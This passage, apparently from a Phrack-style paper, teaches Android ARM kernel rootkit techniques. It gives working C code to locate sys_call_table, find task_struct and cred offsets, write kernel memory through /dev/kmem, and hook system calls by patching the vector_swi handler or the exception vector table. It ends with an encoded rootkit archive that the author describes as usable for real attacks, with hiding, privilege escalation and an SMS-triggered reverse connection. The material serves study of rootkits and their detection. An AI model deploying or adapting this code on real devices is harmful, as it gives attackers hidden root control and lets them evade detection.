+hiding symbol and moving to the field of read-only have been adapted to
+protect sys_call_table from attackers. These protections, however,
+can be easily removed if an attacker uses kmem device access technique.
+To discuss other techniques making protection useless is beyond the purpose
+of this paper.
+
+
+--[ 2.1 - Searching sys_call_table
+
+If sys_call_table symbol is not exported and there is no sys_call_table
+information in kallsyms file which contains kernel symbol table
+information, it will be difficult to get the sys_call_table address that
+varies on each version of platform kernel. So, we need to research the way
+to get the address of sys_call_table without symbol table information.
+
+You can find the similar techniques in the web[10], but apart from this,
+this paper is written to meet the Android platform on the way of testing.
+
+
+--[ 2.1.1 - Getting sys_call_table address in vector_swi handler
+
+At first, I will introduce the first two ways to get sys_call_table address
+The code I will introduce here is written dependently in the interrupt
+implementation of ARM process.
+
+Generally, in the case of ARM process, when interrupt or exception happens,
+it branches to the exception vector table. In that exception vector table,
+there are exception hander addresses that match each exception handler
+routines. The kernel of present Android platform uses high vector
+(0xffff0000) and at the point of 0xffff0008, offset by 0x08, there is a 4
+byte instruction to branch to the software interrupt handler. When the
+instruction runs, the address of the software interrupt handler stored in
+the address 0xffff0420, offset by 0x420, is called. See the section 5.1 for
+more information.
+
+void get_sys_call_table(){
+	void *swi_addr=(long *)0xffff0008;
+	unsigned long offset=0;
+	unsigned long *vector_swi_addr=0;
+	unsigned long sys_call_table=0;
+
+	offset=((*(long *)swi_addr)&0xfff)+8;
+	vector_swi_addr=*(unsigned long *)(swi_addr+offset);
+
+	while(vector_swi_addr++){
+		if(((*(unsigned long *)vector_swi_addr)&
+		0xfffff000)==0xe28f8000){
+			offset=((*(unsigned long *)vector_swi_addr)&
+			0xfff)+8;
+			sys_call_table=(void *)vector_swi_addr+offset;
+			break;
+		}
+	}
+	return;
+}
+
+At first, this code gets the address of vector_swi routine(software
+interrupt process exception handler) in the exception vector table of high
+vector and then, gets the address of a code that handles the
+sys_call_table address. The followings are some parts of vector_swi handler
+code.
+
+000000c0 <vector_swi>:
+    c0: e24dd048 sub     sp, sp, #72     ; 0x48 (S_FRAME_SIZE)
+    c4: e88d1fff stmia   sp, {r0 - r12}  ; Calling r0 - r12
+    c8: e28d803c add     r8, sp, #60     ; 0x3c (S_PC)
+    cc: e9486000 stmdb   r8, {sp, lr}^   ; Calling sp, lr
+    d0: e14f8000 mrs     r8, SPSR        ; called from non-FIQ mode, so ok.
+    d4: e58de03c str     lr, [sp, #60]   ; Save calling PC
+    d8: e58d8040 str     r8, [sp, #64]   ; Save CPSR
+    dc: e58d0044 str     r0, [sp, #68]   ; Save OLD_R0
+    e0: e3a0b000 mov     fp, #0  ; 0x0   ; zero fp
+    e4: e3180020 tst     r8, #32 ; 0x20  ; this is SPSR from save_user_regs
+    e8: 12877609 addne   r7, r7, #9437184; put OS number in
+    ec: 051e7004 ldreq   r7, [lr, #-4]
+    f0: e59fc0a8 ldr     ip, [pc, #168]  ; 1a0 <__cr_alignment>
+    f4: e59cc000 ldr     ip, [ip]
+    f8: ee01cf10 mcr     15, 0, ip, cr1, cr0, {0} ; update control register
+    fc: e321f013 msr     CPSR_c, #19     ; 0x13 enable_irq
+   100: e1a096ad mov     r9, sp, lsr #13 ; get_thread_info tsk
+   104: e1a09689 mov     r9, r9, lsl #13
+[*]108: e28f8094 add     r8, pc, #148    ; load syscall table pointer
+   10c: e599c000 ldr     ip, [r9]        ; check for syscall tracing
+
+The asterisk part is the code of sys_call_table. This code notifies the
+start of sys_call_table at the appointed offset from the present pc
+address. So, we can get the offset value to figure out the position of
+sys_call_table if we can find opcode pattern corresponding to "add r8, pc"
+instruction.
+
+opcode: 0xe28f8???
+
+if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){
+	offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8;
+	sys_call_table=(void *)vector_swi_addr+offset;
+	break;
+
+From this, we can get the address of sys_call_table handled in
+vector_swi handler routine. And there is an easier way to do this.
+
+
+--[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching
+
+The second way to get the address of sys_call_table is simpler than the way
+introduced in 2.1.1. This way is to find the address by using the fact that
+sys_close address, with open symbol, is in 0x6 offset from the starting
+point of sys_call_table.
+
+... the same vector_swi address searching routine parts omitted ...
+
+	while(vector_swi_addr++){
+		if(*(unsigned long *)vector_swi_addr==&sys_close){
+			sys_call_table=(void *)vector_swi_addr-(6*4);
+			break;
+		}
+	}
+}
+
+By using the fact that sys_call_table resides after vector_swi handler
+address, we can search the sys_close which is appointed as the sixth system
+call of sys_table_call.
+
+fs/open.c:
+EXPORT_SYMBOL(sys_close);
+...
+
+call.S:
+/* 0 */		CALL(sys_restart_syscall)
+		CALL(sys_exit)
+		CALL(sys_fork_wrapper)
+		CALL(sys_read)
+		CALL(sys_write)
+/* 5 */		CALL(sys_open)
+		CALL(sys_close)
+
+This searching way has a technical disadvantage that we must get the
+sys_close kernel symbol address beforehand if it's implemented in user
+mode.
+
+
+--[ 2.2 - Identifying sys_call_table size
+
+The hooking technique which will be introduced in section 4 changes the
+sys_call_table handle code within vector_swi handler. It generates the copy
+of the existing sys_call_table in the heap memory. Because the size of
+sys_call_table varies in each platform kernel version, we need a precise
+size of sys_call_table to generate a copy.
+
+... the same vector_swi address searching routine parts omitted ...
+
+	while(vector_swi_addr++){
+		if(((*(unsigned long *)vector_swi_addr)&
+		0xffff0000)==0xe3570000){
+			i=0x10-(((*(unsigned long *)vector_swi_addr)&
+			0xff00)>>8);
+			size=((*(unsigned long *)vector_swi_addr)&
+			0xff)<<(2*i);
+			break;
+		}
+	}
+}
+
+This code searches code which controls the size of sys_call_table within
+vector_swi routine and then gets the value, the size of sys_call_table.
+The following code determines the size of sys_call_table, and it makes a
+part of a function that calls system call saved in sys_call_table.
+
+   118: e92d0030 stmdb   sp!, {r4, r5}   ; push fifth and sixth args
+   11c: e31c0c01 tst     ip, #256        ; are we tracing syscalls?
+   120: 1a000008 bne     148 <__sys_trace>
+[*]124: e3570f5b cmp     r7, #364        ; check upper syscall limit
+   128: e24fee13 sub     lr, pc, #304    ; return address
+   12c: 3798f107 ldrcc   pc, [r8, r7, lsl #2] ; call sys_* routine
+
+The asterisk part compares the size of sys_call_table. This code checks if
+the r7 register value which contains system call number is bigger than
+syscall limit. So, if we search opcode pattern(0xe357????) corresponding to
+"cmp r7", we can get the exact size of sys_call_table. For your
+information, all of the offset values can be obtained by using ARM
+architecture operand counting method.
+
+
+--[ 2.3 - Getting over the problem of structure size in kernel versions
+
+Even if you are using the same version of kernels, the size of structure
+varies according to the compile environments and config options. Thus, if
+we use a wrong structure with a wrong size, it is not likely to work as we
+expect. To prevent errors caused by the difference of structure offset and
+to enable our code to work in various kernel environments, we need to build
+a function which gets the offset needed from the structure.
+
+void find_offset(void){
+	unsigned char *init_task_ptr=(char *)&init_task;
+	int offset=0,i;
+	char *ptr=0;
+
+	/* getting the position of comm offset
+	   within task_struct structure */
+	for(i=0;i<0x600;i++){
+		if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&&
+		init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&&
+		init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&&
+		init_task_ptr[i+6]=='r'){
+			comm_offset=i;
+			break;
+		}
+	}
+	/* getting the position of tasks.next offset
+	   within task_struct structure */
+	init_task_ptr+=0x50;
+	for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){
+		offset=*(long *)init_task_ptr;
+		if(offset&&offset>0xc0000000){
+			offset-=i;
+			offset+=comm_offset;
+			if(strcmp((char *)offset,"init")){
+				continue;
+			} else {
+				next_offset=i;
+
+				/* getting the position of parent offset
+				   within task_struct structure */
+				for(;i<0x300;i+=4,init_task_ptr+=4){
+					offset=*(long *)init_task_ptr;
+					if(offset&&offset>0xc0000000){
+						offset+=comm_offset;
+						if(strcmp
+						((char *)offset,"swapper"))
+						{
+							continue;
+						} else {
+							parent_offset=i+4;
+							break;
+						}
+					}
+				}
+				break;
+			}
+		}
+	}
+	/* getting the position of cred offset
+	   within task_struct structure */
+	init_task_ptr=(char *)&init_task;
+	init_task_ptr+=comm_offset;
+	for(i=0;i<0x50;i+=4,init_task_ptr-=4){
+		offset=*(long *)init_task_ptr;
+		if(offset&&offset>0xc0000000&&offset<0xd0000000&&
+			offset==*(long *)(init_task_ptr-4)){
+			ptr=(char *)offset;
+			if(*(long *)&ptr[4]==0&&
+				*(long *)&ptr[8]==0&&
+				*(long *)&ptr[12]==0&&
+				*(long *)&ptr[16]==0&&
+				*(long *)&ptr[20]==0&&
+				*(long *)&ptr[24]==0&&
+				*(long *)&ptr[28]==0&&
+				*(long *)&ptr[32]==0){
+				cred_offset=i;
+				break;
+			}
+		}
+	}
+	/* getting the position of pid offset
+	   within task_struct structure */
+	pid_offset=parent_offset-0xc;
+
+	return;
+}
+
+This code gets the information of PCB(process control block) using some
+features that can be used as patterns of task_struct structure.
+
+First, we need to search init_task for the process name "swapper" to find
+out address of "comm" variable within task_struct structure created before
+init process. Then, we search for "next" pointer from "tasks" which is a
+linked list of process structure. Finally, we use "comm" variable to figure
+out whether the process has a name of "init". If it does, we get the offset
+address of "next" pointer.
+
+include/linux/sched.h:
+struct task_struct {
+...
+	struct list_head tasks;
+...
+	pid_t pid;
+...
+	struct task_struct *real_parent; /* real parent process */
+	struct task_struct *parent; /* recipient of SIGCHLD,
+					wait4() reports */
+...
+	const struct cred *real_cred; /* objective and
+					real subjective task
+					* credentials (COW) */
+	const struct cred *cred; /* effective (overridable)
+					subjective task */
+	struct mutex cred_exec_mutex; /* execve vs ptrace cred
+					calculation mutex */
+
+	char comm[TASK_COMM_LEN]; /* executable name ... */
+
+After this, we get the parent pointer by checking some pointers. And if
+this is a right parent pointer, it has the name of previous task(init_task)
+process, swapper. The reason we search the address of parent pointer is to
+get the offset of pid variable by using a parent offset as a base point.
+
+To get the position of cred structure pointer related with task privilege,
+we perform backward search from the point of comm variable and check if the
+id of each user is 0.
+
+
+--[ 2.4 - Treating version magic
+
+Check the whitepaper[11] of Christian Papathanasiou and Nicholas J. Percoco
+in Defcon 18. The paper introduces the way of treating version magic by
+modifying the header of utsrelease.h when we compile LKM rootkit module.
+In fact, I have used a tool which overwrites the vermagic value of compiled
+kernel module binary directly before they presented.
+
+
+--[ 3 - sys_call_table hooking through /dev/kmem access technique
+
+I hope you take this section as a warming-up. If you want to know more
+detailed background knowledge about /dev/kmem access technique, check the
+"Run-time kernel patching" by Silvio and "Linux on-the-fly kernel patching
+without LKM" by sd.
+
+At least until now, the root privilege of access to /dev/kmem device within
+linux kernel in Android platform is allowed. So, it is possible to move
+through lseek() and to read through read(). Newly written /dev/kmem access
+routines are as follows.
+
+#define MAP_SIZE 4096UL
+#define MAP_MASK (MAP_SIZE - 1)
+
+int kmem;
+
+/* read data from kmem */
+void read_kmem(unsigned char *m,unsigned off,int sz)
+{
+        int i;
+        void *buf,*v_addr;
+
+        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
+	MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
+                perror("read: mmap error");
+                exit(0);
+        }
+        for(i=0;i<sz;i++){
+                v_addr=buf+(off&MAP_MASK)+i;
+                m[i]=*((unsigned char *)v_addr);
+        }
+        if(munmap(buf,MAP_SIZE*2)==-1){
+                perror("read: munmap error");
+                exit(0);
+        }
+	return;
+}
+
+/* write data to kmem */
+void write_kmem(unsigned char *m,unsigned off,int sz)
+{
+        int i;
+        void *buf,*v_addr;
+
+        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
+	MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
+                perror("write: mmap error");
+                exit(0);
+        }
+        for(i=0;i<sz;i++){
+                v_addr=buf+(off&MAP_MASK)+i;
+                *((unsigned char *)v_addr)=m[i];
+        }
+        if(munmap(buf,MAP_SIZE*2)==-1){
+                perror("write: munmap error");
+                exit(0);
+        }
+	return;
+}
+
+This code makes the kernel memory address we want shared with user memory
+area as much as the size of two pages and then we can read and write the
+kernel by reading and writing on the shared memory. Even though the
+searched sys_call_table is allocated in read-only area, we can simply
+modify the contents of sys_call_table through /dev/kmem access technique.
+The example of hooking through sys_call_table modification is as follows.
+
+kmem=open("/dev/kmem",O_RDWR|O_SYNC);
+if(kmem<0){
+	return 1;
+}
+...
+if(c=='I'||c=='i'){ /* install */
+	addr_ptr=(char *)get_kernel_symbol("hacked_getuid");
+	write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4);
+	addr_ptr=(char *)get_kernel_symbol("hacked_writev");
+	write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4);
+	addr_ptr=(char *)get_kernel_symbol("hacked_kill");
+	write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4);
+	addr_ptr=(char *)get_kernel_symbol("hacked_getdents64");
+	write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4);
+} else if(c=='U'||c=='u'){ /* uninstall */
+	...
+}
+close(kmem);
+
+The attack code can be compiled in the mode of LKM module and general ELF32
+executable file format.
+
+
+--[ 4 - modifying sys_call_table handle code in vector_swi handler routine
+
+The techniques introduced in section 3 are easily detected by rootkit
+detection tools. So, some pioneers have researched the ways which modify
+some parts of exception handler function processing software interrupt.
+The technique introduced in this section generates a copy version of
+sys_call_table in kernel heap memory without modifying the
+sys_call_table directly.
+
+static void *hacked_sys_call_table[500];
+static void **sys_call_table;
+int sys_call_table_size;
+...
+
+int init_module(void){
+...
+	get_sys_call_table(); // position and size of sys_call_table
+	memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4);
+
+After generating this copy version, we have to modify some parts of
+sys_call_table processed within vector_swi handler routine. It is because
+sys_call_table is handled as a offset, not an address. It is a feature that
+separates ARM architecture from ia32 architecture.
+
+code before compile:
+ENTRY(vector_swi)
+...
+	get_thread_info tsk
+	adr     tbl, sys_call_table ; load syscall table pointer
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table
+	ldr     ip, [tsk, #TI_FLAGS] ; @ check for syscall tracing
+
+code after compile:
+000000c0 <vector_swi>:
+...
+   100: e1a096ad mov     r9, sp, lsr #13 ; get_thread_info tsk
+   104: e1a09689 mov     r9, r9, lsl #13
+[*]108: e28f8094 add     r8, pc, #148    ; load syscall table pointer
+                 ~~~~~~~~~~~~~~~~~~~~
+                 +-> deal sys_call_table as relative offset
+   10c: e599c000 ldr     ip, [r9]        ; check for syscall tracing
+
+So, I contrived a hooking technique modifying "add r8, pc, #offset" code
+itself like this.
+
+before modifying: e28f80??	add     r8, pc, #??
+after  modifying: e59f80??	ldr     r8, [pc, #??]
+
+These instructions get the address of sys_call_table at the specified
+offset from the present pc address and then store it in r8 register. As a
+result, the address of sys_call_table is stored in r8 register. Now, we
+have to make a separated space to store the address of sys_call_table copy
+near the processing routine. After some consideration, I decided to
+overwrite nop code of other function's epilogue near vector_swi handler.
+
+00000174 <__sys_trace_return>:
+   174: e5ad0008 str     r0, [sp, #8]!
+   178: e1a02007 mov     r2, r7
+   17c: e1a0100d mov     r1, sp
+   180: e3a00001 mov     r0, #1  ; 0x1
+   184: ebfffffe bl      0 <syscall_trace>
+   188: eaffffb1 b       54 <ret_to_user>
+[*]18c: e320f000 nop     {0}
+        ~~~~~~~~ -> position to overwrite the copy of sys_call_table
+   190: e320f000 nop     {0}
+        ...
+
+  000001a0 <__cr_alignment>:
+   1a0: 00000000                                ....
+
+  000001a4 <sys_call_table>:
+
+Now, if we count the offset from the address of sys_call_table to the
+address overwritten with the address of sys_call_table copy and then modify
+code, we can use the table we copied whenever system call is called. The
+hooking code modifying some parts of vector_swi handling routine and nop
+code near the address of sys_call_table is as follows:
+
+void install_hooker(){
+	void *swi_addr=(long *)0xffff0008;
+	unsigned long offset=0;
+	unsigned long *vector_swi_addr=0,*ptr;
+	unsigned char buf[MAP_SIZE+1];
+	unsigned long modify_addr1=0;
+	unsigned long modify_addr2=0;
+	unsigned long addr=0;
+	char *addr_ptr;
+
+	offset=((*(long *)swi_addr)&0xfff)+8;
+	vector_swi_addr=*(unsigned long *)(swi_addr+offset);
+
+	memset((char *)buf,0,sizeof(buf));
+	read_kmem(buf,(long)vector_swi_addr,MAP_SIZE);
+	ptr=(unsigned long *)buf;
+
+	/* get the address of ldr that handles sys_call_table */
+	while(ptr){
+		if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){
+			modify_addr1=(unsigned long)vector_swi_addr;
+			break;
+		}
+		ptr++;
+		vector_swi_addr++;
+	}
+	/* get the address of nop that will be overwritten */
+	while(ptr){
+		if(*(unsigned long *)ptr==0xe320f000){
+			modify_addr2=(unsigned long)vector_swi_addr;
+			break;
+		}
+		ptr++;
+		vector_swi_addr++;
+	}
+
+	/* overwrite nop with hacked_sys_call_table */
+	addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table");
+	write_kmem((char *)&addr_ptr,modify_addr2,4);
+
+	/* calculate fake table offset */
+	offset=modify_addr2-modify_addr1-8;
+
+	/* change sys_call_table offset into fake table offset */
+	addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */
+	addr_ptr=(char *)addr;
+	write_kmem((char *)&addr_ptr,modify_addr1,4);
+
+	return;
+}
+
+This code gets the address of the code that handles sys_call_table within
+vector_swi handler routine, and then finds nop code around and stores the
+address of hacked_sys_call_table which is a copy version of sys_call_table.
+After this, we get the sys_call_table handle code from the offset in which
+hacked_sys_call_table resides and then hooking starts.
+
+
+--[ 5 - exception vector table modifying hooking techniques
+
+This section discusses two hooking techniques, one is the hooking technique
+which changes the address of software interrupt exception handler routine
+within exception vector table and the other is the technique which changes
+the offset of code branching to vector_swi handler. The purpose of these
+two techniques is to implement the hooking technique that modifies only
+exception vector table without changing sys_call_table and vector_swi
+handler.
+
+
+--[ 5.1 - exception vector table
+
+Exception vector table contains the address of various exception handler
+routines, branch code array and processing codes to call the exception
+handler routine. These are declared in entry-armv.S, copied to the point of
+the high vector(0xffff0000) by early_trap_init() routine within traps.c
+code, and make one exception vector table.
+
+traps.c:
+void __init early_trap_init(void)
+{
+	unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */
+	extern char __stubs_start[], __stubs_end[];
+	extern char __vectors_start[], __vectors_end[];
+	extern char __kuser_helper_start[], __kuser_helper_end[];
+	int kuser_sz = __kuser_helper_end - __kuser_helper_start;
+
+	/*
+	 * Copy the vectors, stubs and kuser helpers
+	(in entry-armv.S)
+	 * into the vector page, mapped at 0xffff0000,
+	and ensure these
+	 * are visible to the instruction stream.
+	 */
+	memcpy((void *)vectors, __vectors_start,
+	__vectors_end - __vectors_start);
+	memcpy((void *)vectors + 0x200, __stubs_start,
+	__stubs_end - __stubs_start);
+
+After the processing codes are copied in order by early_trap_init()
+routine, the exception vector table is initialized, then one exception
+vector table is made as follows.
+
+# ./coelacanth -e
+[000] ffff0000: ef9f0000 [Reset]          ; svc 0x9f0000 branch code array
+[004] ffff0004: ea0000dd [Undef]          ; b   0x380
+[008] ffff0008: e59ff410 [SWI]            ; ldr pc, [pc, #1040] ; 0x420
+[00c] ffff000c: ea0000bb [Abort-perfetch] ; b   0x300
+[010] ffff0010: ea00009a [Abort-data]     ; b   0x280
+[014] ffff0014: ea0000fa [Reserved]       ; b   0x404
+[018] ffff0018: ea000078 [IRQ]            ; b   0x608
+[01c] ffff001c: ea0000f7 [FIQ]            ; b   0x400
+[020] Reserved
+... skip ...
+[22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array
+[230] ffff0230: c003d920 [__irq_invalid]
+[234] ffff0234: c003d920 [__irq_invalid]
+[238] ffff0238: c003d9c0 [__irq_svc]
+[23c] ffff023c: c003d920 [__irq_invalid]
+...
+[420] ffff0420: c003df40 [vector_swi]
+
+When software interrupt occurs, 4 byte instruction at 0xffff0008 is
+executed. The code copies the present pc to the address of exception
+handler and then branches. In other words, it branches to the vector_swi
+handler routine at 0x420 of exception vector table.
+
+
+--[ 5.2 - Hooking techniques changing vector_swi handler
+
+The hooking technique changing the vector_swi handler is the first one that
+will be introduced. It changes the address of exception handler routine
+that processes software interrupt within exception vector table and calls
+the vector_swi handler routine forged by an attacker.
+
+	1. Generate the copy version of sys_call_table in kernel heap and
+	   then change the address of routine as aforementioned.
+	2. Copy not all vector_swi handler routine but the code before
+	   handling sys_call_table to kernel heap for simple hooking.
+	3. Fill the values with right values for the copied fake vector_swi
+	   handler routine to act normally and change the code to call the
+	   address of sys_call_table copy version. (generated in step 1)
+	4. Jump to the next position of sys_call_table handle code of
+	   original vector_swi handler routine.
+	5. Change the address of vector_swi handler routine of exception
+	   vector table to the address of fake vector_swi handler code.
+
+The completed fake vector_swi handler has a code like following.
+
+00000000 <new_vector_swi>:
+    00: e24dd048 sub     sp, sp, #72     ; 0x48
+    04: e88d1fff stmia   sp, {r0 - r12}
+    08: e28d803c add     r8, sp, #60     ; 0x3c
+    0c: e9486000 stmdb   r8, {sp, lr}^
+    10: e14f8000 mrs     r8, SPSR
+    14: e58de03c str     lr, [sp, #60]
+    18: e58d8040 str     r8, [sp, #64]
+    1c: e58d0044 str     r0, [sp, #68]
+    20: e3a0b000 mov     fp, #0  ; 0x0
+    24: e3180020 tst     r8, #32 ; 0x20
+    28: 12877609 addne   r7, r7, #9437184
+    2c: 051e7004 ldreq   r7, [lr, #-4]
+ [*]30: e59fc020 ldr     ip, [pc, #32]  ; 0x58 <__cr_alignment>
+    34: e59cc000 ldr     ip, [ip]
+    38: ee01cf10 mcr     15, 0, ip, cr1, cr0, {0}
+    3c: f1080080 cpsie   i
+    40: e1a096ad mov     r9, sp, lsr #13
+    44: e1a09689 mov     r9, r9, lsl #13
+ [*]48: e59f8000 ldr     r8, [pc, #0]
+ [*]4c: e59ff000 ldr     pc, [pc, #0]
+ [*]50: <hacked_sys_call_table address>
+ [*]54: <vector_swi address to jmp>
+ [*]58: <__cr_alignment routine address referring at 0x30>
+
+The asterisk parts are the codes modified or added to the original code. In
+addition to the part that we modified to make the code refer __cr_alignment
+function, I added some instructions to save address of sys_call_table copy
+version to r8 register, and jump back to the original vector_swi handler
+function. Following is the attack code written as a kernel module.
+
+static unsigned char new_vector_swi[500];
+...
+
+void make_new_vector_swi(){
+	void *swi_addr=(long *)0xffff0008;
+	void *vector_swi_ptr=0;
+	unsigned long offset=0;
+	unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0;
+	unsigned long add_r8_pc_addr=0;
+	unsigned long ldr_ip_pc_addr=0;
+	int i;
+
+	offset=((*(long *)swi_addr)&0xfff)+8;
+	vector_swi_addr=*(unsigned long *)(swi_addr+offset);
+	vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */
+	orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */
+
+	/* processing __cr_alignment */
+	while(vector_swi_addr++){
+		if(((*(unsigned long *)vector_swi_addr)&
+		0xfffff000)==0xe28f8000){
+			add_r8_pc_addr=(unsigned long)vector_swi_addr;
+			break;
+		}
+		/* get __cr_alingment's addr */
+		if(((*(unsigned long *)vector_swi_addr)&
+		0xfffff000)==0xe59fc000){
+			offset=((*(unsigned long *)vector_swi_addr)&
+			0xfff)+8;
+			ldr_ip_pc_addr=*(unsigned long *)
+			((char *)vector_swi_addr+offset);
+		}
+	}
+	/* creating fake vector_swi handler */
+	memcpy(new_vector_swi,(char *)orig_vector_swi_addr,
+	(add_r8_pc_addr-orig_vector_swi_addr));
+	offset=(add_r8_pc_addr-orig_vector_swi_addr);
+	for(i=0;i<offset;i+=4){
+		if(((*(long *)&new_vector_swi[i])&
+		0xfffff000)==0xe59fc000){
+			*(long *)&new_vector_swi[i]=0xe59fc020;
+			// ldr ip, [pc, #32]
+			break;
+		}
+	}
+	/* ldr r8, [pc, #0] */
+	*(long *)&new_vector_swi[offset]=0xe59f8000;
+	offset+=4;
+	/* ldr pc, [pc, #0] */
+	*(long *)&new_vector_swi[offset]=0xe59ff000;
+	offset+=4;
+	/* fake sys_call_table */
+	*(long *)&new_vector_swi[offset]=hacked_sys_call_table;
+	offset+=4;
+	/* jmp original vector_swi's addr */
+	*(long *)&new_vector_swi[offset]=(add_r8_pc_addr+4);
+	offset+=4;
+	/* __cr_alignment's addr */
+	*(long *)&new_vector_swi[offset]=ldr_ip_pc_addr;
+	offset+=4;
+
+	/* change the address of vector_swi handler
+	   within exception vector table */
+	*(unsigned long *)vector_swi_ptr=&new_vector_swi;
+
+	return;
+}
+
+This code gets the address which processes the sys_call_table within
+vector_swi handler routine and then copies original contents of vector_swi
+to the fake vector_swi variable before the address we obtained. After
+changing some parts of fake vector_swi to make the code refer _cr_alignment
+function address correctly, we need to add instructions that save the
+address of sys_call_table copy version to r8 register and jump back to the
+original vector_swi handler function. Finally, hooking starts when we
+modify the address of vector_swi handler function within exception vector
+table.
+
+
+--[ 5.3 - Hooking techniques changing branch instruction offset
+
+The second hooking technique to change the branch instruction offset within
+exception vector table is that we don't change vector_swi handler and
+change the offset of 4 byte branch instruction code called automatically
+when the software interrupt occurs.
+
+	1. Proceed to step 4 like the way in section 5.1.
+	2. Store the address of generated fake vector_swi handler routine
+	   in the specific area within exception vector table.
+	3. Change 1 byte which is an offset of 4 byte instruction codes at
+	   0xffff0008 and store.
+
+The code compared with section 5.2 is as follows.
+
+- *(unsigned long *)vector_swi_ptr=&new_vector_swi;
+...
++ *(unsigned long *)(vector_swi_ptr+4)=&new_vector_swi; /* 0xffff0424 */
+...
++ *(unsigned long *)swi_addr+=4; /* 0xe59ff410 -> 0xe59ff414 */
+
+The changed exception vector table after hooking is as follows.
+
+# ./coelacanth -e
+[000] ffff0000: ef9f0000 [Reset]          ; svc 0x9f0000 branch code array
+[004] ffff0004: ea0000dd [Undef]          ; b   0x380
+[008] ffff0008: e59ff414 [SWI]            ; ldr pc, [pc, #1044] ; 0x424
+[00c] ffff000c: ea0000bb [Abort-perfetch] ; b   0x300
+[010] ffff0010: ea00009a [Abort-data]     ; b   0x280
+[014] ffff0014: ea0000fa [Reserved]       ; b   0x404
+[018] ffff0018: ea000078 [IRQ]            ; b   0x608
+[01c] ffff001c: ea0000f7 [FIQ]            ; b   0x400
+[020] Reserved
+... skip ...
+[420] ffff0420: c003df40 [vector_swi]
+[424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code
+
+Hooking starts when the address of a fake vector_swi handler code is stored
+at 0xffff0424 and the 4 byte branch instruction offset at 0xffff0008
+changes the address around 0xffff0424 for reference.
+
+
+--[ 6 - Conclusion
+
+One more time, I thank many pioneers for their devotion and inspiration.
+I also hope various Android rootkit researches to follow. It is a pity
+that I couldn't cover all the ideas that occurred in my mind during
+writing this paper. However, I also think that it is better to discuss
+the advanced and practical techniques next time -if you like this one ;-)-.
+
+For more information, the attached example code provides not only file &
+process hiding and kernel module hiding features but also the classical
+rootkit features such as admin privilege succession to specific gid user
+and process privilege changing. I referred to the Defcon 18 whitepaper of
+Christian Papathanasiou and Nicholas J. Percoco for performing the reverse
+connection when we receive a sms message from an appointed phone number.
+
+Thanks to:
+vangelis and GGUM for translating Korean into English. Other than those who
+helped me on this paper, I'd like to thank my colleagues, people in my
+graduate school and everyone who knows me.
+
+
+--[ 7 - References
+
+ [1] "Abuse of the Linux Kernel for Fun and Profit" by halflife
+     [Phrack issue 50, article 05]
+
+ [2] "Weakening the Linux Kernel" by plaguez
+     [Phrack issue 52, article 18]
+
+ [3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare
+     [runtime-kernel-kmem-patching.txt]
+
+ [4] "Linux on-the-fly kernel patching without LKM" by sd & devik
+     [Phrack issue 58, article 07]
+
+ [5] "Handling Interrupt Descriptor Table for fun and profit" by kad
+     [Phrack issue 59, article 04]
+
+ [6] "trojan eraser or i want my system call table clean" by riq
+     [Phrack issue 54, article 03]
+
+ [7] "yet another article about stealth modules in linux" by riq
+     ["abtrom: anti btrom" in a mail to Bugtraq]
+
+ [8] "Saint Jude, The Model" by Timothy Lawless
+     [http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf]
+
+ [9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem
+     [Phrack issue 58, article 08]
+
+[10] "Android LKM Rootkit" by fred
+     [http://upche.org/doku.php?id=wiki:rootkit]
+
+[11] "This is not the droid you're looking for..." by Trustwave
+     [DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf]
+
+
+--[ 8 - Appendix: earthworm.tgz.uu
+
+I attach a demo code to demonstrate the concepts which I explained in this
+paper. This code can be used as a real code for attack or just a proof-of-
+concept code. I wish you use this code only for your study not for a bad
+purpose.
+
+<++> earthworm.tgz.uu
+begin-base64 644 earthworm.tgz
+H4sIAH8LtU0AA+w9aXfTyLLzNTqH/9DjgSA5krc4CwnmXR5kIJewnASGO4/J
+0ZHltq2xtiPJWQa4v/1VdbdkSZYTJxMCDO0TEquX6uraurq6WlArSsanQeQ1
+f/pin1ar29ra2IC/7FP+y7632xvdzU6r3cFyeNjY+olsfDmUZp9pnFgRIT9F
+QZBc1O6y+u/0QzP+x+exaVuuayZW36UN++bGaLVbrc1udwH/21vrG+sl/ne3
+2u2fSOvmUFj8+cH536wrdfwhb8dOTODHCkPqD5wzEgxJMqbkzTiy7AlRT09P
+GyH73giikUZAbhzbpTvY97E/iAJnQELXSoYgS6RvxXRAXMefnpEJjXzqEqTf
+xEmweVHSyDgIJo4/InYwoAKZx67LBk9onMTklEaUDAKfksAnL4MkgMHIf95u
+dVrEgz6u2mlsNjoPjMCzwrYYT0Mwlj8gzyzXOjsnR+To+XvjZbvdOsp1Wu80
+HqQdGtjjVZDAqGMrIXHgUUDJT6gPKHjWOfGDBKnjnpMkIIA+iT0gwmzSnmWP
